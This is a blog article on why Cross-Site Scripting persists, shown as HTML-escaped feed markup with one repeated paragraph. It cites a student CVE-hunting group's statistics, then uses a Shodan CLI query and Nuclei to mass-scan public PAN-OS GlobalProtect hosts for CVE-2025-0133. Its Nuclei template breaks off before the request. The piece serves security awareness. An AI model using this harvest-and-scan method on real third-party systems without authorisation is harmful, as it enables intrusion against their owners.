&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;In the middle of 2025, are we still talking about XSS? Yes, we still are. Even with the use of modern frameworks, intelligent WAFs and a plethora of articles explaining how to mitigate this threat, Cross-Site Scripting (XSS) is still present, sneaky, persistent and often overlooked.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;XSS is one of the first vulnerabilities covered in introductory courses on offensive security and web application penetration testing. With a simple payload, instructors demonstrate how trivial this flaw is to exploit, highlighting the danger and ease of its exploitation.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;introduction-xss-still&amp;#34;&amp;gt;Introduction: &amp;amp;ldquo;XSS? Still?&amp;amp;rdquo;
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;In the middle of 2025, are we still talking about XSS? Yes, we still are. Even with the use of modern frameworks, intelligent WAFs and a plethora of articles explaining how to mitigate this threat, Cross-Site Scripting (XSS) is still present, sneaky, persistent and often overlooked.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;XSS is one of the first vulnerabilities covered in introductory courses on offensive security and web application penetration testing. With a simple payload, instructors demonstrate how trivial this flaw is to exploit, highlighting the danger and ease of its exploitation.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;XSS is one of the first vulnerabilities covered in introductory courses on offensive security and web application penetration testing. With a simple payload, instructors demonstrate how trivial this flaw is to exploit, highlighting the danger and ease of its exploitation.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;But what is XSS anyway? According to &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://owasp.org/www-community/attacks/xss/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;OWASP&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, Cross-Site Scripting attacks are a type of injection in which malicious scripts are inserted into vulnerable websites. These attacks occur when an attacker uses a web application to send malicious code, usually scripts executed in the browser, to another user. The flaws that make these attacks possible are quite common and arise whenever a web application incorporates user input into the generated output without carrying out appropriate validation or coding.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Also according to &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://owasp.org/www-community/attacks/xss/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;OWASP&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, the victim&amp;#39;s browser has no mechanism for distinguishing legitimate scripts from malicious ones. Thus, when it receives and executes the code, it trusts that it came from a secure source. As a result, the attacker can access cookies, session tokens and other sensitive information stored by the browser, as well as rewriting the content of the page or redirecting the user to malicious sites disguised as legitimate ones.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image.png&amp;#34;
	width=&amp;#34;462&amp;#34;
	height=&amp;#34;160&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image_hu_e521a21402f0fae0.png 480w, /articles/xss-nao-esta-morto/image_hu_452c6b4617d6a6e9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Simple example of an XSS payload to execute a message.&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;288&amp;#34;
		data-flex-basis=&amp;#34;693px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;cve-hunters-vs-xss&amp;#34;&amp;gt;CVE-Hunters vs XSS
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; group was created in November 2024 as a joint initiative between students and a teacher, with a clear objective: to identify vulnerabilities (CVEs) in open source projects. The proposal was to give students practical experience in searching for flaws in real environments, going beyond controlled labs or Capture The Flag (CTF) challenges.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Since then, the group has analyzed a wide range of projects, from small community systems to applications widely used in the public and educational sectors. Along the way, one pattern has stood out: the frequency with which &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt; vulnerabilities have been found.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This recurrence raises an important question: have developers stopped treating XSS seriously enough? Despite being a widely documented and known flaw for years, it still appears frequently. Even in organizations with mature development processes, XSS vulnerabilities continue to appear due to the complexity of input and output flows, the use of legacy libraries or the lack of contextualized testing.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Currently, the group has &amp;lt;b&amp;gt;135 reported vulnerabilities&amp;lt;/b&amp;gt;, &amp;lt;b&amp;gt;53 of which have already been officially registered as CVEs&amp;lt;/b&amp;gt;. Of the total number of vulnerabilities discovered, &amp;lt;b&amp;gt;104 are of the XSS type&amp;lt;/b&amp;gt;, which represents a significant and worrying proportion.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/1.png&amp;#34;
	width=&amp;#34;1024&amp;#34;
	height=&amp;#34;768&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/1_hu_9cbac253be823803.png 480w, /articles/xss-nao-esta-morto/1_hu_e09f18163500396d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Vulnerabilities types Found by CVE-Hunters&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;133&amp;#34;
		data-flex-basis=&amp;#34;320px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;62 occurrences of the stored type and 42 of the reflected type were identified, revealing a relatively even distribution.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/2.png&amp;#34;
	width=&amp;#34;1024&amp;#34;
	height=&amp;#34;768&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/2_hu_9d85e2af39ca47f0.png 480w, /articles/xss-nao-esta-morto/2_hu_b7c8b0a71c9c5136.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Amount of Stored vs Reflected XSS&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;133&amp;#34;
		data-flex-basis=&amp;#34;320px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This statistics alone reinforces the idea that XSS is still a real problem, often overlooked during development, and that it continues to deserve attention, both from the technical community and from developers responsible for applications in production.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;practical-experience&amp;#34;&amp;gt;&amp;lt;strong&amp;gt;Practical experience&amp;lt;/strong&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;You may now be thinking: &amp;#34;OK, the &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; group has found a lot of XSS in open source projects, but who&amp;#39;s to say that large companies are also vulnerable?&amp;#34;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Let&amp;#39;s do a quick experiment, with one of the most recent XSS disclosed during the writing of this article: &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://security.paloaltonetworks.com/CVE-2025-0133&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-2025-0133&amp;lt;/a&amp;gt;.&amp;lt;/b&amp;gt; An XSS reflected in the GlobalProtect gateway and portal products, features of Palo Alto Networks&amp;#39; PAN-OS, published on May 14, 2025.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;With a simple query on Shodan, we can check the estimated amount of use of this product in the world.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-1.png&amp;#34;
	width=&amp;#34;2502&amp;#34;
	height=&amp;#34;572&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-1_hu_e49695ca67986346.png 480w, /articles/xss-nao-esta-morto/image-1_hu_9a3164d2b1826f8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Shodan’s search for pages with Global Protect&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;437&amp;#34;
		data-flex-basis=&amp;#34;1049px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;However, this doesn&amp;#39;t mean that everyone is vulnerable. Let&amp;#39;s go through the experiment for this article.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;First, we extract some results from Shodan, a small sample of the total amount:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-bash&amp;#34; data-lang=&amp;#34;bash&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;shodan search --fields hostnames &amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;http.title:&amp;amp;#34;GlobalProtect Portal&amp;amp;#34; port:443&amp;amp;#39;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;|&amp;lt;/span&amp;gt; grep -v &amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;^$&amp;amp;#39;&amp;lt;/span&amp;gt; &amp;amp;gt; globalprotect-hostnames.txt
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-2.png&amp;#34;
	width=&amp;#34;1715&amp;#34;
	height=&amp;#34;877&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-2_hu_f5d23ac8a0a8c2d7.png 480w, /articles/xss-nao-esta-morto/image-2_hu_80e917587581191.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Shodan CLI used to export pages with Global Protect&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;195&amp;#34;
		data-flex-basis=&amp;#34;469px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;After that, we can use &amp;lt;b&amp;gt;&amp;lt;code&amp;gt;Nuclei&amp;lt;/code&amp;gt;&amp;lt;/b&amp;gt; to test for this vulnerability and automate the test:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-bash&amp;#34; data-lang=&amp;#34;bash&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;nuclei -l globalprotect-hostnames.txt -t CVE-2025-0133.yaml
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-3.png&amp;#34;
	width=&amp;#34;1629&amp;#34;
	height=&amp;#34;867&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-3_hu_a4ac1f5eae1ec9f0.png 480w, /articles/xss-nao-esta-morto/image-3_hu_a7cb5b9475b5bb68.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Nuclei’s results for CVE-2025-0133 template&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;450px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Template used for scanning: &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-2025-0133&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;21
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;22
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;23
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;24
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;25
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;26
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;27
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;28
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;29
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;30
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;31
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;32
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;33
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;34
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;35
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;36
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;37
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;38
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;39
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;40
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;41
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;42
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;43
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;44
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-bash&amp;#34; data-lang=&amp;#34;bash&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;id: CVE-2025-0133
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;info:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  name: PAN-OS - Reflected Cross-Site Scripting
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  author: xbow,DhiyaneshDK
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  severity: medium
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  description: &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;|&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    A reflected cross-site scripting &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;XSS&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;s browser when they click on a specially crafted link.The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN.
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;  reference:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    - https://security.paloaltonetworks.com/CVE-2025-0133
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    - https://hackerone.com/reports/3096384
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;  classification:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    epss-score: 0.00102
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    epss-percentile: 0.29276
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;  metadata:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    verified: true
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    max-request: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    shodan-query:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;      - http.favicon.hash:&amp;amp;#34;-631559155&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;      - cpe:&amp;amp;#34;cpe:2.3:o:paloaltonetworks:pan-os&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    fofa-query: icon_hash=&amp;amp;#34;-631559155&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    product: pan-os
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    vendor: paloaltonetworks
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;  tags: hackerone,cve,cve2025,xss,panos,global-protect
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;http:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;  - raw:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;      - |
